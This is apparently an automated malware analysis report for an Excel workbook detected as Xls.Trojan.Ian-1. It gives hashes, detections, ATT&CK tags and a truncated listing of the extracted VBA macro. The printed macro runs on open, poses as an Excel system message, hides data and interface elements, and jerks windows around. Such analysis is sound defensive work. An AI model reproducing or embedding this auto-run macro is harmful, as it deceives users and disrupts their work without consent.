Xls.Trojan.Ian-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e498e3948d2f643c…

MALICIOUS

Office (OLE)

50.5 KB Created: 2002-04-27 05:09:50 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 61bba3b603f3248b3f39cac8788420db SHA-1: d9521d58e411888c8c21129ba9a3c1c489c8f901 SHA-256: e498e3948d2f643c74d11214480d1ea6318e9747a0ccb208771b6d7ace8f86ca
120 Risk Score

Malware Insights

Xls.Trojan.Ian-1 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristic for an Auto_Open macro strongly indicate malicious intent. The VBA script manipulates the Excel interface, displays alarming messages, and attempts to prompt the user for confirmation, which are common tactics for social engineering or to mask further malicious activity. The script's truncated nature prevents a full analysis of its ultimate payload, but its presence and behavior are indicative of a trojan.

Heuristics 3

  • ClamAV: Xls.Trojan.Ian-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Ian-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18822 bytes
SHA-256: b9ca3b3bd14dcc72da71b3f2b94011564a5fee2bc1b8c7ce7e48f461f6451ec7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ian's Other Macros"

'
' The fun starts here
'

Public Redisplay

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    TrapTime
End Sub

Sub TrapTime()
Attribute TrapTime.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnTime earliesttime:=#1/2/97 10:00:00 AM#, procedure:="MyFinalGiftToYou"
End Sub

Sub MyFinalGiftToYou()
Attribute MyFinalGiftToYou.VB_Description = "Just so you don't forget me!!!!"
Attribute MyFinalGiftToYou.VB_ProcData.VB_Invoke_Func = " \n14"
    Redisplay = False
    Sheets("Data Sheet").Select
    MsgBox "Data Backup is due. " & Chr$(10) & "Please press YES to comence" & Chr$(10) & "or NO to defer until later.", vbInformation + vbYesNo, "Microsoft Excel - System Message"
    Cells.Select
    For Counter = 34 To 36
        Selection.Font.ColorIndex = Counter
    Next
    MsgBox "BEWARE! - Excel is possessed by" & Chr$(10) & " a highly mischievous spirit!" & Chr$(10) & Chr$(10) & "Please PANIC NOW!!!!!!!!!", vbExclamation, "Message from the past"
    Application.DisplayFormulaBar = False
    Application.DisplayStatusBar = False
    Toolbars(2).Visible = False
    Toolbars(1).Visible = False
    ActiveWindow.FreezePanes = False
    With ActiveWindow
        .SplitColumn = 0
        .SplitRow = 0
    End With
    Range("A1").Select
    Selection.AutoFilter
    With ActiveWindow
        .DisplayGridlines = False
        .DisplayHeadings = False
        .DisplayHorizontalScrollBar = False
        .DisplayVerticalScrollBar = False
        .DisplayWorkbookTabs = False
    End With
    Response = MsgBox("Would you like your data back?", vbYesNo + vbQuestion, "Message")
    If Response = vbYes Then
        Redisplay = True
    End If
    If Redisplay = True Then
        Cells.Select
        For Counter = 35 To 34 Step -1
            Selection.Font.ColorIndex = Counter
        Next
        Selection.Font.ColorIndex = xlAutomatic
    End If
    For counter2 = 1 To 2
        With Application
            .WindowState = xlNormal
            .Top = 0
            .Left = 0
            .Width = 605
            .Height = 455
        End With
        With ActiveWindow
            .WindowState = xlNormal
            .Width = 605
            .Height = 425
            .Left = 0
            .Top = 0
        End With
        For Counter = 605 To 125 Step -2
            Application.Width = Counter
        Next
        For Counter = 455 To 35 Step -2
            Application.Height = Counter
        Next
        For Counter = 0 To 220
            With Application
                .Top = Counter
                .Left = Counter
            End With
        Next
        MsgBox "There is nothing you can do" & Chr$(10) & "except sit back and watch.", vbExclamation, "You are no longer in control"
        For Counter = 220 To 0 Step -1
            With Application
                .Top = Counter
                .Left = Counter
            End With
        Next
        For Counter = 125 To 605 Step 2
            Application.Width = Counter
        Next
        For Counter = 35 To 455 Step 2
            Application.Height = Counter
        Next
        Application.WindowState = xlMaximized
        For Counter = 350 To 0 Step -2
            With ActiveWindow
                .Top = 190 - Counter * 0.543
                .Left = 255 - Counter * 0.73
                .Height = 43.45 + Counter * 1.081
                .Width = 75 + Counter * 1.514
            End With
        Next
        For Counter = 350 To 0 Step -2
            With ActiveWindow
                .Top = Counter * 0.543
                .Left = Counter * 0.729
            End With
        Next
        For Counter = 0 To 532 Step 4
            ActiveWindow.Left = Counter
        Next
        For Counter = 0 To 382 Step 2
            ActiveWindow.Top = Counter
        Next
        For Counter = 532 To 0 Step -4
            ActiveWindow.Left = Counter
        Next
        For Counter = 382 To 0 Step -2
           
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.